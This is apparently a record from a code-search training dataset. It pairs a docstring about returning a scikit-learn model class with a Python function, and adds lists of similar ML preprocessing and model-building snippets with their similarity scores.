pd.DataFrame(data).as_matrix()\n else:\n return pd.DataFrame(data)", "def zzX_to_poly(f, *symbols):\n from sympy.polys import Poly\n\n terms = {}\n\n for monom, coeff in zzX_to_dict(f).iteritems():\n terms[monom] = Integer(int(coeff))\n\n return Poly(terms, *symbols)", "def preprocess_feature(df):", "def preprocess_features(features):\n rowsum = np.array(features.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n features = r_mat_inv.dot(features)\n return features.todense(), sparse_to_tuple(features)", "def preprocess_features(features):\n rowsum = np.array(features.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n features = r_mat_inv.dot(features)\n return features.todense(), sparse_to_tuple(features)", "def preprocess_features(features):\r\n rowsum = np.array(features.sum(1))\r\n r_inv = np.power(rowsum, -1).flatten()\r\n r_inv[np.isinf(r_inv)] = 0.\r\n r_mat_inv = np.diag(r_inv)\r\n features = r_mat_inv.dot(features)\r\n return features", "def map_feature(X1, X2):\n degree = 6\n out = np.ones(X1.shape)\n \n for i in range(1, degree + 1):\n for j in range(0, i + 1):\n out = np.concatenate((out, np.power(X1, (i - j)) * np.power(X2, j)), axis=-1)\n\n return out", "def getFeatureContributions(self, clf, features, ser_X):\n labels = list(set(features).intersection(ser_X.index))\n ser_X_sub = ser_X.loc[labels]\n df_coef = pd.DataFrame(clf.coef_, columns=features)\n df_X = pd.concat([ser_X_sub for _ in range(len(clf.coef_))], axis=1)\n df_X = df_X.T\n df_X.index = df_coef.index\n df_result = df_X.multiply(df_coef)\n return df_result", "def _coeff_to_df(self):\n dct = self._coeff_to_dict()\n\n return (\n pd.DataFrame(data=dct.items(), columns=[\"feature\", \"coeff\"])\n .sort_values(by=\"coeff\", ascending=False)\n .reset_index(drop=True)\n )", "def coefficients(self):\r\n return self.coef_['x']", "def transform(self, X):\n for i,f in enumerate(self.features):\n X[f] = self._label_encoders_[i].transform(X[f])\n return X", "def feature_transform(feature, crs_out, crs_in={'init': 'epsg:4326'}):\n p_in = Proj(crs_in)\n p_out = Proj(crs_out)\n feature_out = copy.deepcopy(feature)\n new_coords = []\n if feature['geometry']['type'] == 'Polygon':\n # Probably also work for multypolygons\n for ring in feature['geometry']['coordinates']:\n x2, y2 = transform(p_in, p_out, *zip(*ring))\n new_coords.append(zip(x2, y2))\n 
feature_out['geometry']['coordinates'] = new_coords\n elif feature['geometry']['type'] == 'Point':\n # Probably doesn't work for multipoints\n new_coords = transform(p_in, p_out, *feature['geometry']['coordinates'])\n feature_out['geometry']['coordinates'] = new_coords\n else:\n raise ValueError('Unsuported feature type')\n return feature_out", "def _poly2view(X):\n X = np.asarray([np.power(x, 2) for x in X])\n return X", "def get_list_features(feature):\n result = np.array([])\n result = np.append(result,feature.mfcc)\n result = np.append(result,feature.d_mfcc)\n result = np.append(result,feature.lpc)\n result = np.append(result,feature.d_lpc)\n result = np.append(result,feature.zc_rate)\n result = np.append(result,feature.d_zc_rate)\n result = np.append(result,feature.spec_centroid)\n result = np.append(result,feature.d_spec_centroid)\n return result", "def preprocess_features(features):\r\n rowsum = np.array(features.sum(1))\r\n r_inv = np.power(rowsum, -1).flatten()\r\n r_inv[np.isinf(r_inv)] = 0.\r\n r_mat_inv = sp.diags(r_inv)\r\n features = r_mat_inv.dot(features)\r\n return sparse_to_tuple(features)", "def transform(self, X, verbose = False):\n if self.verbose:\n t = Timer()\n X = features_colorspace(X, self.params[\"colorspace\"])\n feature_list = list()\n feature_list.append(\n features_spatial(X, self.params[\"spatial_size\"], self.params[\"spatial_channels\"]))\n feature_list.append(\n features_hist(X, self.params[\"hist_bins\"], self.params[\"hist_channels\"]))\n feature_list.append(\n features_hog(X, self.params[\"hog_block_norm\"], self.params[\"hog_transform_sqrt\"], self.params[\"hog_channels\"]))\n features = np.concatenate(feature_list, axis = 1)\n if self.verbose:\n print(\"Number of features: {}\".format(features.shape[1]))\n print(\"Time to transform : {:.4e}\".format(t.tock()/X.shape[0]))\n return features", "def __call__(self, *args, **kwargs):\n self.features = dict((k, v()) for k, v in self.features.items())\n return self.features", "def extract_vectors(row):\n # tuple(x for x in row if x not in ['pcaFeatures'])+\n return tuple(float(x) for x in row.pcaFeatures.values)", "def predict(self, X):\n # TODO\n \n # Perform polynomial expansion on X \n X = self.polyfeatures(X, self.degree)\n \n n = len(X)\n\n # add 1s column\n X_ = np.c_[np.ones([n, 1]), X]\n \n n, d = X_.shape\n d = d-1 # remove 1 for the extra column of ones we added to get the original num features\n \n # Standardize all columns by the same standardization of from the fit \n # function \n for j in range(1,d+1): \n X_[:,[j]] = (X_[:,[j]]-self.mus[j-1])/self.stds[j-1]\n \n # predict\n return X_.dot(self.theta)", "def polynomial_expansion(dataframe,columns=[], degree=3,frame_type='spark',only_return_polys=False,id_col='ID'):\n if(degree <2):\n raise Exception('Degree must be >= 2. Got: '+str(degree))\n if frame_type == 'spark':\n from pyspark.sql.functions import pow, col\n\n df = dataframe\n if only_return_polys:\n df = df.select(id_col, columns)\n\n for column in columns:\n for i in range(2,degree+1):\n df = df.withColumn(column+'_'+'^'+str(i), pow(col(column), i) )\n return df\n else:\n pass", "def create(pdef):\n from sklearn.pipeline import Pipeline\n return [Pipeline(p) for p in pdef]", "def feature_forward(self, x):\n raise NotImplementedError" ]
[ "0.7088703", "0.69679934", "0.66370046", "0.6578305", "0.6512583", "0.6453376", "0.63881963", "0.6234599", "0.6210643", "0.6198964", "0.61715096", "0.61595196", "0.6012623", "0.60067403", "0.595723", "0.5934394", "0.58879584", "0.5873344", "0.582992", "0.5797094", "0.57733417", "0.5773121", "0.57382864", "0.5718979", "0.57173944", "0.57056445", "0.5676183", "0.56503546", "0.5626869", "0.5606366", "0.5589378", "0.5581953", "0.5554252", "0.55068696", "0.54837865", "0.54688376", "0.54651403", "0.5462564", "0.5441759", "0.5441238", "0.54367447", "0.54268754", "0.54249316", "0.54048586", "0.5387218", "0.53680503", "0.5363701", "0.5359736", "0.5353863", "0.5350062", "0.5349721", "0.53459984", "0.53412944", "0.5333009", "0.5327628", "0.5324549", "0.53202206", "0.53177947", "0.5296694", "0.5295481", "0.5292716", "0.52917796", "0.5287281", "0.5276046", "0.5273302", "0.5272569", "0.5271748", "0.5270257", "0.52557474", "0.5246424", "0.5244619", "0.52421284", "0.52399", "0.5232967", "0.5230174", "0.52292365", "0.5220613", "0.520819", "0.52074116", "0.5203844", "0.5200246", "0.52000266", "0.52000266", "0.51991683", "0.5197924", "0.5191357", "0.51851004", "0.5179172", "0.5175812", "0.5169656", "0.5167971", "0.5166184", "0.51539546", "0.5142615", "0.51410943", "0.5140609", "0.5134531", "0.5134231", "0.5133987", "0.51264566" ]
0.77433574
0
return a scikitlearn model class, and the required arguments
def get_model_class(class_name, kwargs={}): # , Perceptron, PassiveAggressiveRegressor # , NuSVR, LinearSVR if class_name == 'LinearRegression': from sklearn.linear_model import LinearRegression return LinearRegression(**kwargs) if class_name == 'SGDRegressor': from sklearn.linear_model import SGDRegressor return SGDRegressor(**kwargs) if class_name == 'SVR': from sklearn.svm import SVR return SVR(**kwargs) if class_name == 'DecisionTreeRegressor': from sklearn.tree import DecisionTreeRegressor return DecisionTreeRegressor(**kwargs) if class_name == 'ExtraTreesRegressor': from sklearn.ensemble import ExtraTreesRegressor return ExtraTreesRegressor(**kwargs) if class_name == 'KNeighborsRegressor': from sklearn.neighbors import KNeighborsRegressor return KNeighborsRegressor(**kwargs) if class_name == 'MLPRegressor': from sklearn.neural_network import MLPRegressor return MLPRegressor(**kwargs) raise Exception("Unknown Model class")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self):\n self.name = \"Schaffer\"\n objectives = [o_sh_1, o_sh_2]\n decisions = [Decision(-10 ** 5, 10 ** 5)]\n Model.__init__(self, objectives, None, decisions)", "def modelClass(self):\n raise NotImplementedError", "def __init__(self):\n self.name = \"Kursawe\"\n objectives = [o_ku_1, o_ku_2]\n decisions = [Decision(-5, 5), Decision(-5, 5), Decision(-5, 5)]\n Model.__init__(self, objectives, None, decisions)", "def build_model():", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def get_model(*args):\n return Model()", "def convert_to_model(self, *args):", "def MakeModel(self):\n pass", "def __init__(self):\n self.name = \"Osyczka\"\n objectives = [ob_os_1, ob_os_2]\n constraints = [con_os_1, con_os_2, con_os_3, con_os_4, con_os_5, con_os_6]\n decisions = [Decision(0, 10), Decision(0, 10), Decision(1, 5), Decision(0, 6), Decision(1, 5), Decision(0, 10)]\n Model.__init__(self, objectives, constraints, decisions)", "def create_model():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--DISC_LR', type=float, default=1e-4)\r\n parser.add_argument('--GEN_LR', type=float, default=1e-3)\r\n parser.add_argument('--GEN_BETA1', type=float, default=0.9)\r\n parser.add_argument('--GEN_BETA2', type=float, default=0.999)\r\n parser.add_argument('--IMAGE_SIZE', type=int, default=None)\r\n parser.add_argument('--QUES_SIZE', type=int, default=None)\r\n parser.add_argument('--QUES_EMBED_SIZE', type=int, default=2048)\r\n parser.add_argument('--WORD_EMBED_SIZE', type=int, default=512)\r\n parser.add_argument('--VOCAB_SIZE', type=int, default=1004)\r\n args, task_args = parser.parse_known_args()\r\n override_if_not_in_args('--max_steps', '1000', task_args)\r\n override_if_not_in_args('--batch_size', '64', task_args)\r\n override_if_not_in_args('--eval_set_size', '370', task_args)\r\n override_if_not_in_args('--eval_interval_secs', '2', task_args)\r\n override_if_not_in_args('--log_interval_secs', '2', task_args)\r\n override_if_not_in_args('--min_train_eval_rate', '2', task_args)\r\n\r\n return Model(args.DISC_LR, args.GEN_LR, args.GEN_BETA1, args.GEN_BETA2,\r\n args.IMAGE_SIZE, args.QUES_EMBED_SIZE, args.WORD_EMBED_SIZE,\r\n args.QUES_SIZE, args.VOCAB_SIZE), task_args", "def build_model_fn(self):", "def make_model():\n m = model_class(*argv[2:-1])\n modelobj[\"model\"] = m", "def build_model(self, **kwargs):\n raise NotImplementedError()", "def __init__(self, *args):\n this = _libsbml.new_ModelCreator(*args)\n try: self.this.append(this)\n except: self.this = this", "def model(self) -> Type[Model]:", "def __init__(self, model = None, cso = None, fast_classification = True, paper = None):\n self.cso = cso #Stores the CSO Ontology\n self.paper = paper #Paper to analyse\n self.model = model #contains the cached model\n self.min_similarity = 0.90 #Initialises the min_similarity\n self.fast_classification = fast_classification # if will use the full model or not\n self.explanation = dict()", "def build_model(train_inputs,train_labels,model_params,model_mode='classification',\n model_type='naive_bayes'):\n if model_mode == \"classification\":\n if model_type == \"naive_bayes\":\n model = GaussianNB()\n if model_type == \"knn\":\n model = KNeighborsClassifier(n_neighbors=50)\n if model_type == \"svm\":\n model = SVC(kernel='poly', degree =27, coef0 =1, C=5)\n if model_type == \"decision_tree\":\n model = DecisionTreeClassifier(min_samples_split=45,min_samples_leaf=45,criterion=\"gini\")\n #model = 
RandomForestClassifier(n_estimators=500, n_jobs=-1)\n\n if model_mode == \"regression\":\n if model_type == \"knn\":\n model = KNeighborsRegressor()\n if model_type == \"svm\":\n model = SVR()\n if model_type == \"decision_tree\":\n model = DecisionTreeRegressor()\n\n\n model.fit(train_inputs, train_labels)\n # for name, score in zip(train_inputs.columns,model.feature_importances_):\n # print(name, score)\n\n return model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def make_stax_model(self):", "def model() -> Model:\n return Model()", "def create_model(self, **inputs):\n raise NotImplementedError('This method has to be overwritten.')", "def create_model(self):\r\n model = self.model_fn(self.flags)\r\n print(model)\r\n return model", "def build_model(self):\n raise NotImplementedError", "def create_model(self):\n pass", "def create_model(self):\n pass", "def _build_model(self):\n raise NotImplementedError()", "def __init__(self, *args):\n this = _libsbml.new_Model(*args)\n try: self.this.append(this)\n except: self.this = this", "def model(self) -> str:\n ...", "def __init__(self, model: str, **kwargs):\n super().__init__(model=model)", "def __init__(self, model):\n\t\tself.model = model", "def build_model(self):\n pass", "def build_model(self):\n pass", "def build_model(cls, args):\n base_architecture(args) \n return StyleGANGeneratorPretrain(args)", "def __init__(self, model: object):\n self.model = model", "def createModel(self, sid=\"\"):\n return _libsbml.SBMLDocument_createModel(self, sid)", "def __init__(self, x_train, model):\n self.x_train = x_train\n self.model = model", "def get_model(self):\n raise NotImplementedError(\n \"You must provide a 'get_model' method for the '%r' index.\" % self\n )", "def create_model():\n\n class Net(nn.Cell):\n def construct(self, x, y):\n return x\n\n net = Net()\n model_simple = Model(net)\n\n return model_simple", "def gen_model():\n\n\tmodel = skipthoughts.load_model()\n\treturn model", "def get_result_model(cls):\n raise NotImplementedError()", "def __init__(self, **kwargs):\n super(Model, self).__init__(**kwargs)", "def build_model(cls, args, task):\n raise NotImplementedError(\"Model must implement the build_model method\")", "def create_model(instance):\n name, nitems, sets = instance\n model = grb.Model(name)\n\n # One variable for each set. Also remember which sets cover each item.\n covered_by = [[] for i in range(nitems)]\n vars = []\n for i, set in enumerate(sets):\n cost, covers = set\n vars.append(model.addVar(obj=cost, vtype=grb.GRB.BINARY, name=\"s_{0}\".format(i)))\n\n for item in covers:\n covered_by[item].append(vars[i])\n model.update()\n\n # Constraint: Each item covered at least once.\n for item in range(nitems):\n model.addConstr(grb.quicksum(covered_by[item]) >= 1)\n\n # We want to minimize. 
Objective coefficients already fixed during variable creation.\n model.setAttr(\"ModelSense\", grb.GRB.MINIMIZE)\n\n # Tuning parameters derived from sc_330_0\n model.read(\"mip.prm\")\n\n model.setParam(\"Threads\", 3)\n model.setParam(\"MIPGap\", 0.001) # 0.1% usually suffices\n\n return model, vars", "def __init__(self, **kwargs):\n\n def paraChck(**kwargs):\n \"\"\"\n check and validate the keyword argument input\n \"\"\"\n import sys\n\n \n def_val = {\n 'x_train':None,\n 'y_train':None,\n 'x_test':None,\n 'y_test':None,\n 'channel':1,\n 'input_img_cols':72,\n 'input_img_rows':72,\n 'nb_classes':13,\n 'nb_epoch': 5,\n 'batch_size' : 16,\n 'dict_label' : None} # default parameteters value\n\n diff = set(kwargs.keys()) - set(def_val.keys())\n if diff:\n print(\"Invalid args:\",tuple(diff),file=sys.stderr)\n return\n\n def_val.update(kwargs)\n return def_val\n \n def_val = paraChck(**kwargs)\n\n class Bunch(object):\n def __init__(self, adict):\n self.__dict__.update(adict)\n \n self.x_train = def_val['x_train']\n self.y_train = def_val['y_train']\n self.x_test = def_val['x_test']\n self.y_test = def_val['y_test']\n self.channels = def_val['channel']\n self.input_img_rows = def_val['input_img_rows']\n self.input_img_cols = def_val['input_img_cols']\n self.nb_classes = def_val['nb_classes']\n self.plot_model = None\n self.model = None\n self.nb_epoch = def_val['nb_epoch']\n self.batch_size = def_val['batch_size']\n self.dict_label = def_val['dict_label']\n \n # default label dictionary if users do not provide\n values = ['label_' + str(i).zfill(2) for i in range(0,self.nb_classes)]\n keys = range(self.nb_classes) \n \n if self.dict_label is None:\n self.dict_label = dict(zip(keys, values))\n else:\n self.dict_label = kwargs['dict_label']\n \n self.dict_factor = {v: k for k, v in self.dict_label.items()}", "def _default_make_sa_model(model):\n name = model._meta.object_name + \".__aldjemy__\"\n return type(name, (), {\"__module__\": model.__module__})", "def __call__(self,setup_options=True, instantiate_options=True, verbose=False):\n model = self.setup(setup_options)\n model(instantiate_options, verbose)\n return model", "def create_reid_model(name, *args, **kwargs):\r\n if name not in __factory:\r\n raise KeyError(\"Unknown model:\", name)\r\n return __factory[name](*args, **kwargs)", "def _build_model(self, **kwargs):\n pass", "def __init__(self, **kwargs):\n\n # Identify the mode to start the model in\n if \"x\" in kwargs and \"y\" in kwargs:\n x = kwargs.get(\"x\")\n y = kwargs.get(\"y\")\n if \"model_name\" not in kwargs:\n self.__mode = \"train\"\n else:\n self.__mode = \"retrain\"\n elif \"model_name\" in kwargs:\n self.__mode = \"test\"\n else:\n raise NameError(\"Cannot infer mode from arguments.\")\n\n print(\"Initializing model in %s mode.\" % self.__mode)\n\n if self.mode == \"train\":\n # Infer input type from type(x)\n if type(x[0]) == np.bytes_:\n print(\"Input type is 'binary mols'.\")\n self.__input_type = \"mols\" # binary RDKit mols\n else:\n print(\"Input type is 'molecular descriptors'.\")\n self.__input_type = \"descriptors\" # other molecular descriptors\n\n # If scaling is required\n if kwargs.get(\"scaling\", False) is True:\n # Normalize the input\n print(\"Applying scaling on input.\")\n self.__scaler = StandardScaler()\n x = self.__scaler.fit_transform(x)\n else:\n self.__scaler = None\n\n # If PCA is required\n if kwargs.get(\"pca\", False) is True:\n print(\"Applying PCA on input.\")\n self.__pca = PCA(\n n_components=x.shape[1]\n ) # n_components=n_features 
for now\n x = self.__pca.fit_transform(x)\n else:\n self.__pca = None\n\n self.__maxlen = (\n kwargs.get(\"dataset_info\")[\"maxlen\"] + 10\n ) # Extend maxlen to avoid breaks in training\n self.__charset = kwargs.get(\"dataset_info\")[\"charset\"]\n self.__dataset_name = kwargs.get(\"dataset_info\")[\"name\"]\n self.__lstm_dim = kwargs.get(\"lstm_dim\", 256)\n self.__h_activation = kwargs.get(\"h_activation\", \"relu\")\n self.__bn = kwargs.get(\"bn\", True)\n self.__bn_momentum = kwargs.get(\"bn_momentum\", 0.9)\n self.__noise_std = kwargs.get(\"noise_std\", 0.01)\n self.__td_dense_dim = kwargs.get(\n \"td_dense_dim\", 0\n ) # >0 squeezes RNN connections with Dense sandwiches\n self.__batch_size = kwargs.get(\"batch_size\", 256)\n self.__dec_layers = kwargs.get(\"dec_layers\", 2)\n\n if self.input_type == \"descriptors\":\n self.__codelayer_dim = x.shape[1] # features\n if \"codelayer_dim\" in kwargs:\n print(\n \"Ignoring requested codelayer_dim because it is inferred from the cardinality of the descriptors.\"\n )\n else:\n self.__codelayer_dim = kwargs.get(\"codelayer_dim\", 128)\n \n # Create the left/right-padding vectorizers\n self.__smilesvec1 = SmilesVectorizer(\n canonical=False,\n augment=True,\n maxlength=self.maxlen,\n charset=self.charset,\n binary=True,\n )\n\n self.__smilesvec2 = SmilesVectorizer(\n canonical=False,\n augment=True,\n maxlength=self.maxlen,\n charset=self.charset,\n binary=True,\n leftpad=False,\n )\n\n # self.train_gen.next() #This line is needed to set train_gen.dims (to be fixed in HetSmilesGenerator)\n self.__input_shape = self.smilesvec1.dims\n self.__dec_dims = list(self.smilesvec1.dims)\n self.__dec_dims[0] = self.dec_dims[0] - 1\n self.__dec_input_shape = self.dec_dims\n self.__output_len = self.smilesvec1.dims[0] - 1\n self.__output_dims = self.smilesvec1.dims[-1]\n\n # Build all sub-models as untrained models\n if self.input_type == \"mols\":\n self.__build_mol_to_latent_model()\n else:\n self.__mol_to_latent_model = None\n\n self.__build_latent_to_states_model()\n self.__build_batch_model()\n\n # Build data generators\n self.__build_generators(x, y)\n\n # Retrain or Test mode\n else:\n self.__model_name = kwargs.get(\"model_name\")\n\n # Load the model\n self.__load(self.model_name)\n \n if self.mode == \"retrain\":\n # If scaling is required\n if self.scaler is not None:\n print(\"Applying scaling on input.\")\n x = self.scaler.transform(x)\n\n # If PCA is required\n if self.pca is not None:\n print(\"Applying PCA on input.\")\n x = self.pca.transform(x)\n \n # Build data generators\n self.__build_generators(x, y)\n\n # Build full model out of the sub-models\n self.__build_model()\n\n # Show the resulting full model\n print(self.model.summary())", "def C(cls, *args, **kwargs):\n return cls(*args, model_type='classifier', **kwargs)", "def _train_model(self):\n raise NotImplementedError()", "def __init__(self):\n self.model = self._get_model()\n\n # NOTE: The order of this list hardcoded here, and needs to be changed when re-training the model!\n # When exporting the model in tflite format, the model_spec is lost, so we cannot do it like that:\n # classes = ['???'] * model.model_spec.config.num_classes\n # label_map = model.model_spec.config.label_map\n # for label_id, label_name in label_map.as_dict().items():\n # classes[label_id-1] = label_name\n self.classes = ['Baked Goods', 'Salad', 'Cheese', 'Seafood', 'Tomato']", "def create_model(self):\n model = solph.Model(self.es)\n return model", "def get_model_class(model_name, task_name):\n if 
task_name == 'rocstories':\n return OpenAIGPTDoubleHeadsModel if model_name == 'openai-gpt' else GPT2DoubleHeadsModel\n else:\n return OpenAIGPTLMHeadModel if model_name == 'openai-gpt' else GPT2LMHeadModel", "def __init__(self):\n self.model = None", "def __init__(self):\n self.model = None", "def __call__(self, X):\n return self.model(X)", "def __init__(self, model):\n self._model = model", "def _create_model(self, key):\n pass", "def __init__(self, model_uri: str = None, method: str = \"predict\", modelUri: str = None, type: str = None):\n super().__init__()\n print(model_uri, modelUri, type)\n self.model_uri = model_uri\n self.method = method\n self.ready = False\n self.load()", "def _build_model(self,m_type, sess, weight, X, Y, ls_scale, y_scale, **kwargs):\n if m_type == 'sgp':\n return self._build_sgp_model(sess, weight, X, Y, ls_scale, y_scale,**kwargs)\n elif m_type == 'sgp_full':\n return self._build_sgp_model_full(sess, weight, X, Y, ls_scale, y_scale,**kwargs)\n# elif m_type == 'dgp2':\n# return self._build_dgp_model(2,sess,weight, X, Y, ls_scale, y_scale,**kwargs)\n# elif m_type == 'dgp3':\n# return self._build_dgp_model(3,sess, weight, X, Y, ls_scale, y_scale,**kwargs)\n raise ValueError(\"{} is invalid model type\".format(m_type))", "def get_model(args, num_classes):\n data_size = 224\n image = nn.Variable([1, 3, data_size, data_size])\n pimage = image_preprocess(image)\n pred, hidden = model_resnet.resnet_imagenet(\n pimage, num_classes, args.num_layers, args.shortcut_type, test=True, tiny=False)\n Model = namedtuple('Model', ['image', 'pred', 'hidden'])\n return Model(image, pred, hidden)", "def train_model(self, *args, **kwargs):\n raise NotImplementedError", "def classkey (self):\n return 'rmodel:%s' % (self.__class__.__name__.lower ())", "def __call__(self, x, **kwargs):\n return self.model(x)", "def __createCovidModelInstance(self, *args, **kwargs):\n try:\n if 'MODEL_TYPE' in kwargs:\n if kwargs['MODEL_TYPE'] == CovidModel.AGGREGATE_CASES_DECEASED:\n covidModel = CovidAggregateTotals() \n self.CovidData = covidModel.getData(*args,**kwargs)\n self.DataAvailable=self.__isDataAvailable(self.CovidData)\n return \n \n if kwargs['MODEL_TYPE'] == CovidModel.MONTHLY_CASES_DECEASED:\n covidModel = CovidMonthlyTotals() \n self.CovidData = covidModel.getData(*args,**kwargs)\n self.DataAvailable=self.__isDataAvailable(self.CovidData)\n return \n\n if kwargs['MODEL_TYPE'] == CovidModel.PAST_30_DAYS:\n covidModel = CovidDailyTotals() \n self.CovidData = covidModel.getData(*args,**kwargs)\n self.DataAvailable=self.__isDataAvailable(self.CovidData)\n return \n\n if kwargs['MODEL_TYPE'] == CovidModel.MESSAGES:\n covidModel = CovidMessages() \n self.CovidData = covidModel.getData(*args,**kwargs)\n self.DataAvailable=self.__isDataAvailable(self.CovidData)\n return\n\n if kwargs['MODEL_TYPE'] == CovidModel.LOCATIONS:\n covidModel = CovidLocationInfo() \n self.CovidData = covidModel.getData(*args,**kwargs)\n self.DataAvailable=self.__isDataAvailable(self.CovidData)\n return\n\n print (\"CovidMessages.__createCovidModelInstance() - did not receive a recognizable model type - no model object instantiated. 
Args received = \",kwargs)\n return None\n except:\n print (\"CovidMessages.__createCovidModelInstance() - unexpected error: \",sys.exc_info()[0])\n return None", "def getModel(self, *args):\n return _libsbml.SBMLValidator_getModel(self, *args)", "def trainModel( self, featureTrain, classTrain):", "def __init__(self):\n super().__init__()\n import sklearn\n import sklearn.svm\n self.model = sklearn.svm.LinearSVR", "def get_model():\n return UNISAL", "def model(self):\n i = self.keras.Input(self.s)\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def create_model(self): # noqa: D103\n # reference for creation of the model https://yilundu.github.io/2016/12/24/Deep-Q-Learning-on-Space-Invaders.html\n model=Sequential()\n model.add(Flatten( input_shape=(84,84,4)))\n model.add(Dense(self.num_actions)) \n\n return model", "def __init__(self, student, teachers, args, name):\n\n super(CachedKDModel, self).__init__(args, \"cached_\" + name)\n\n # Init base models\n self.student = student\n self.teachers = teachers", "def get_model(self, input_shape: Tuple[int, ...], output_classes_count: int, metrics: Union[List[Metric], List[str]]) -> Model:\n pass", "def __init__(self):\n super().__init__()\n import sklearn\n import sklearn.multiclass\n self.model = sklearn.multiclass.OneVsRestClassifier", "def __init__(self,_type: Optional[str] = None,\r\n pre_trained_model_json: Optional[str] = None,\r\n spacy_nlp: Optional[pd.DataFrame] = None):\r\n\r\n if _type is None:\r\n # empty model\r\n self.model = None\r\n self.keywords = None\r\n elif _type == \"fixed\":\r\n if pre_trained_model_json is None:\r\n raise RatingModel.RatingModel.Error(\"pre_trained_model_json is None\")\r\n self.loadModelFixed(pre_trained_model_json)\r\n elif _type == \"lda\":\r\n if pre_trained_model_json is None:\r\n raise RatingModel.RatingModel.Error(\"pre_trained_model_json is None\")\r\n self.loadModelLDA(pre_trained_model_json)\r\n else:\r\n raise RatingModel.RatingModelError( \"type of test not valid. 
Either 'fixed' or 'lda'\")\r\n\r\n print(\"Loading nlp tools...\")\r\n if spacy_nlp is None:\r\n # load default model\r\n self.nlp = loadDefaultNLP()\r\n else:\r\n self.nlp = spacy_nlp\r\n\r\n print(\"Loading pdf parser...\")\r\n # takes some time\r\n from tika import parser\r\n\r\n self.parser = parser", "def set_model(self, model):\n '''returns a model'''\n if self.model==\"Lasso\":\n modelo = Lasso()\n elif self.model==\"Ridge\":\n modelo = Ridge()\n elif self.model == \"RandomForest\":\n modelo = RandomForestRegressor(random_state = 42)\n else:\n if self.model == \"XGBoost\":\n modelo = xgb.XGBRegressor()\n #modelo = xgb.XGBRegressor(booster = 'gbtree', objective ='reg:squarederror',\n # colsample_bytree = 0.3, learning_rate = 0.35,\n # max_depth = 10, alpha = 0.1, n_estimators = 500)\n\n\n return modelo", "def build_model():\n pipeline = Pipeline([('cvect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(LinearSVC(multi_class=\"crammer_singer\"), n_jobs=1))\n ])\n\n parameters = {\n 'clf__estimator__C': 1,\n 'clf__estimator__max_iter': 1000 }\n \n model = GridSearchCV(pipeline, param_grid=parameters)\n\n\n return model", "def model_info():\n pass", "def __init__(self, model: Model1D):\n super().__init__(model=model)", "def __init__(self, model: Model1D):\n super().__init__(model=model)", "def __init__(self, model: Model1D):\n super().__init__(model=model)", "def __init__(self, model: Model1D):\n super().__init__(model=model)", "def __init__(self, model: Model1D):\n super().__init__(model=model)", "def model(self):\n\n # write summaries\n\n i = keras.Input(self.s)\n\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def model(self):\n\n # write summaries\n\n i = keras.Input(self.s)\n\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def __init__(self, model: Type[ModelType]):\n self.model = model", "def __init__(self, model: Type[ModelType]):\n self.model = model", "def __init__(self, params, config=None):\n super(NizzaModel, self).__init__(\n model_fn=self.nizza_model_fn, \n params=params, \n config=config)", "def get_model( ):\n\n return Lasso(alpha = 1e-3, fit_intercept = True, precompute = True, max_iter = 1e4)", "def get_model(self, key: str = None, **kwargs) -> Dict:\n raise NotImplementedError", "def _construct_model(\n self,\n dataset: SupervisedDataset,\n **kwargs: Any,\n ) -> None:\n if self.botorch_model_class is None:\n raise ValueError(\n \"botorch_model_class must be set to construct single model Surrogate.\"\n )\n botorch_model_class = self.botorch_model_class\n\n input_constructor_kwargs = {**self.model_options, **(kwargs or {})}\n botorch_model_class_args = inspect.getfullargspec(botorch_model_class).args\n\n # Temporary workaround to allow models to consume data from\n # `FixedNoiseDataset`s even if they don't accept variance observations\n if \"train_Yvar\" not in botorch_model_class_args and isinstance(\n dataset, FixedNoiseDataset\n ):\n warnings.warn(\n f\"Provided model class {botorch_model_class} does not accept \"\n \"`train_Yvar` argument, but received `FixedNoiseDataset`. 
Ignoring \"\n \"variance observations and converting to `SupervisedDataset`.\",\n AxWarning,\n )\n dataset = SupervisedDataset(X=dataset.X(), Y=dataset.Y())\n\n self._training_data = [dataset]\n\n formatted_model_inputs = botorch_model_class.construct_inputs(\n training_data=dataset, **input_constructor_kwargs\n )\n self._set_formatted_inputs(\n formatted_model_inputs=formatted_model_inputs,\n inputs=[\n [\n \"covar_module\",\n self.covar_module_class,\n self.covar_module_options,\n None,\n ],\n [\"likelihood\", self.likelihood_class, self.likelihood_options, None],\n [\"outcome_transform\", None, None, self.outcome_transform],\n [\"input_transform\", None, None, self.input_transform],\n ],\n dataset=dataset,\n botorch_model_class_args=botorch_model_class_args,\n robust_digest=kwargs.get(\"robust_digest\", None),\n )\n # pyre-ignore [45]\n self._model = botorch_model_class(**formatted_model_inputs)", "def creator():\n return SeamlessFkIk()" ]
[ "0.6693503", "0.65363216", "0.6457696", "0.64020926", "0.6377376", "0.6377376", "0.6377376", "0.6377376", "0.6377376", "0.6333438", "0.6327423", "0.6295708", "0.60578156", "0.6057667", "0.6044534", "0.60367906", "0.5996065", "0.5984835", "0.5975537", "0.59328324", "0.59180677", "0.58972245", "0.58972245", "0.58972245", "0.58972245", "0.58924955", "0.588684", "0.58690536", "0.58329093", "0.5818338", "0.5809204", "0.5809204", "0.5791007", "0.5786873", "0.5783789", "0.5770102", "0.5759291", "0.5746274", "0.5746274", "0.57412446", "0.5729201", "0.5713692", "0.5707756", "0.56951225", "0.5687034", "0.5678298", "0.56774366", "0.5666061", "0.5665944", "0.5663639", "0.5661741", "0.5650342", "0.56291384", "0.56247073", "0.5623504", "0.5621763", "0.56216276", "0.5606747", "0.5574567", "0.55741644", "0.55702764", "0.556728", "0.556728", "0.55634445", "0.55450684", "0.55302095", "0.5526841", "0.55245936", "0.5509303", "0.55075777", "0.5501839", "0.5485863", "0.548097", "0.548049", "0.5480117", "0.5473964", "0.54739463", 